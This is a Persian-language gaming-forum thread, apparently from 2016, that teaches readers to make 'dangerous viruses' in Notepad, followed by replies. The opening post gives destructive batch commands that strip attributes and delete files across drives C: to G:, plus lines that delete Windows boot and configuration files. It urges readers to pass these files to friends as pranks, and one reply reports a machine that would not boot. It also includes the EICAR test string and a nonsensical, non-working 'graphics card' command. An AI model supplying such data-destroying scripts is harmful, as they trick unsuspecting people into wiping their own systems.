امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 5
  • 1
  • 2
  • 3
  • 4
  • 5
روش ساخت 4 ویروس فوق العاده خطرناک در Notepad!!!!
سلام به شما گیمفایی های عزیز. یه راست میرم سر اصل مطلب. به هیچ وجه این ویروس ها رو خودتون امتحان نکنید و فقط به دوستاتون بدید تا یکم بخندین:  S0 (2)

خوب بریم سراغ آموزش:

ساخت یک ویروس برای تست آنتی ویروس شما:

یک فایل Notepad باز کنید.

کد زیر رو داخلش وارد کنید:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

فایل رو با فرمت com. ذخیره کنید مثل --> Hunterson.com

ساخت ویروس برای نابود کردن کارت گرافیک:

روش کار این ویروس به این شکلی هست که حافظه کارت گرافیک قربانی رو به طور کامل پر میکنه و جایی برای اجرا کردن برنامه و بازی های مختلف نمیمونه S0 (2)

یک فایل Notepad باز کنید.

c/windows/system32/jefo/display/memory/full

فایل رو با فرمت bat. ذخیره کنید.

ساخت ویروس نابود کردن کامل ویندوز:
[font=Arial Black][b]یک فایل Notepad باز کنید.
کد زیر رو داخلش وارد کنید:[/font][/b]

[font=tahoma][b][font=arial,helvetica,sans-serif]ATTRIB -a -s -h -r c[/font][/font][/b]
[font=tahoma][b][font=arial,helvetica,sans-serif]ATTRIB -a -s -h -r c:windows*.*
[/font]
[/font][/b][font=tahoma][font=arial,helvetica,sans-serif]Echo y | echo a | Echo y | del c:*.* [/font][/font]

[font=tahoma][font=arial,helvetica,sans-serif]Echo y | echo a | Echo y | del d:*.* [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]Echo y | echo a | Echo y | del e:*.* [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]Echo y | echo a | Echo y | del f:*.* [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]Echo y | echo a | Echo y | del g:*.* [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]echo y | copy *.* C: [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]echo y | copy *.* D: [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]echo y | copy *.* E: [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]echo y | copy *.* F: [/font][/font]
[font=tahoma][font=arial,helvetica,sans-serif]echo y | copy *.* G:[/font][/font]

ساخت ویروس ریستارت کردن ویندوز به طوری که دیگه بالا نیاد:

[font=Arial Black][b]یک فایل Notepad باز کنید.
کد زیر رو داخلش وارد کنید:[/font][/b]

[font=arial,helvetica,sans-serif]del autoexec.bat del config.sys cd winnt del system.ini del win.ini[/font]

پیشنهاد میکنم اصلن این ویروس ها رو خودتون امتحان نکنید و فقط در راه خدا ازشون استفاده کنید S0 (2)
موفق باشید 2vsj1nm113
2lxe53l121

منتظر اعتبار های مدیران عزیز هستیم Eee
4K Wallpaper Games

TeamSpeak: 185.86.180.212:8888
پاسخ
مطلب جالبی بود تشکر
پاسخ
اقا دَمِت داغ .
دقت کرده باشی ویروس به ویروس داری خوفناک تر میشی .
از اون ویروس سرکاری رسیدی به نابودی کامل سیستم و تجهیزاتش .

خسته نباشی .. منم دارم رو یه برنامه کار میکنم که قراره داغ به دل خیلی ها بزاره ....
پاسخ
(01-27-2016, 02:17 PM)سجاد محمدی پور نوشته است: اقا دَمِت داغ .

خسته نباشی .. منم دارم رو یه برنامه کار میکنم که قراره داغ به دل خیلی ها بزاره ....

کوچیکتم عزیز.
اگه پشتیبانی افرادی مثله شما و دلگرمی های شما عزیزان نبود بیخیال ادامه اینجور چیزا میشدم.
منتظریم شاهکار بزرگتو ببینیم S0 (62)
4K Wallpaper Games

پاسخ
این چی بود خدا خیرت بده. فایل دومو ساختم و رو کامپیوتر خودم اجرا کردم Wall . کامپیوتر بعد از ری استارت بالا نیومد .بعد یه بار کارت گرافیکو در آوردم و دوباره گذاشتم سیستم بالا اومد. با این که آنتی ویروس avira با آخرین آپدیت دارم اما چیزی پیدا نکرد بیشتر یه دستور اجرایی بود تا ویروس. به هرحال جالب بود.
[تصویر:  images?q=tbn:ANd9GcQugKLufuOVuLO80fEXlyn...wYEQGMJMEQ]
پاسخ
(01-27-2016, 02:49 PM)THE LEGEND 1 نوشته است: این چی بود خدا خیرت بده. فایل دومو ساختم و رو کامپیوتر خودم اجرا کردم Wall . کامپیوتر بعد از ری استارت بالا نیومد .بعد یه بار کارت گرافیکو در آوردم و دوباره گذاشتم سیستم بالا اومد. با این که آنتی ویروس avira با آخرین آپدیت دارم اما چیزی پیدا نکرد بیشتر یه دستور اجرایی بود تا ویروس. به هرحال جالب بود.

خب دوست عزیز فایل هایی که با پسوند Bat ذخیره میشن توسط سیستم ویروس شناخته نمیشن . اصولا یک نوع دستورن که ... 167

اصولا شکل کسایی که این جور فایلارو باز میکنن این شکلیه :

اول : S0 (66)

بعدش : S0 (17)

و در آخر : 124
پاسخ
بعد اینو بدیم به دوستامون خطرناک نیست؟  بد راهی داره که بعد از اینکه راه  4 رومو دادیم به دوستمون بعدش درست بشه ؟!
پاسخ
(01-27-2016, 02:49 PM)THE LEGEND 1 نوشته است: این چی بود خدا خیرت بده. فایل دومو ساختم و رو کامپیوتر خودم اجرا کردم Wall . کامپیوتر بعد از ری استارت بالا نیومد .بعد یه بار کارت گرافیکو در آوردم و دوباره گذاشتم سیستم بالا اومد. با این که آنتی ویروس avira با آخرین آپدیت دارم اما چیزی پیدا نکرد بیشتر یه دستور اجرایی بود تا ویروس. به هرحال جالب بود.

درسته  این دستورات دستور اجرایی هستن. این فایل ها توسط آنتی ویروس به عنوان ویروس شناخته نمیشن.

(01-27-2016, 03:05 PM)gamertop نوشته است: بعد اینو بدیم به دوستامون خطرناک نیست؟  بد راهی داره که بعد از اینکه راه  4 رومو دادیم به دوستمون بعدش درست بشه ؟!

نه متاسفانه. توی این روش کامپیوتر بعد از ریستارت دیگه روشن نمیشه اما اگه دوس داشته باشی میتونی فایلی بهت بدم که طرف بعد اینکه روش کلیک میکنه بعده 3 ثانیه سیستمش ریستارت میشه و دوباره روشن میشه و درواقع فقط ترس ایجاد میکنه و همون ریستارتی هست که از داخل ویندوز انجام میشه. اگه خواستی بگو بهت فایلو بدم.

روش ساخت دستور ریستارت سیستم (بدون خطر):

اول یک Project داخل برنامه Visual Studio ایجاد کنید.
بر روی فرم خودتون دوبار کلیک کنید تا صفحه نوشتن کد ظاهر بشه.

[تصویر:  aujhnwb1044xwbft0moh.jpg]

داخل " " اول متن خودتون و داخل " " دوم سطر و یا عنوان پیام رو وارد کنید.
بعد فایل رو سیو و ازش استفاده کنید.

نمونه فایل: لینک دانلود

دوستان این فایل هیچ خطری نداره و درواقع همون دستور ریستارت هست که داخل ویندوز موجوده. پس نگران نباشید و اگه خواستید خودتون روش کلیک کنید.
4K Wallpaper Games

پاسخ
دمت گرم!
فکرای شومی زد به کلم  S0 (2)
[تصویر:  76561198355324646.png]
پاسخ
(01-27-2016, 02:34 PM)Hunterson نوشته است:
(01-27-2016, 02:17 PM)سجاد محمدی پور نوشته است: اقا دَمِت داغ .

کوچیکتم عزیز.
اگه پشتیبانی افرادی مثله شما و دلگرمی های شما عزیزان نبود بیخیال ادامه اینجور چیزا میشدم.
منتظریم شاهکار بزرگتو ببینیم S0 (62)

آقا ازین شاهکارا نسازین دودمانمونو به باد میدین آخر  Confused
احسنت بسی جالب و ترسناک بودن
پاسخ

موضوع‌های مشابه…
موضوع نویسنده پاسخ بازدید آخرین ارسال
  دادن منبع برای ساخت بازی who i am 0 1,397 01-17-2017, 12:11 PM
آخرین ارسال: who i am
  آموزش ساخت برنامه برای Restart و Shutdown و Logoff ویندوز Mr.ISO 1 1,916 04-16-2016, 09:06 PM
آخرین ارسال: Maziyar Hemmati
  نرم افزار ویروس یاب(خودم ساختم) kheng 4 2,299 02-26-2016, 07:28 PM
آخرین ارسال: kheng
Exclamation ساخت کثیف ترین فایل مخرب توسط notepad kheng 10 5,758 02-17-2016, 02:04 PM
آخرین ارسال: kheng
  آموزش کار با برنامه Cheat Engine | برنامه ای برای ساخت ترینر Mr.ISO 12 5,652 02-14-2016, 03:12 PM
آخرین ارسال: A Lone Gamer

پرش به انجمن:

کاربرانِ درحال بازدید از این موضوع: 2 مهمان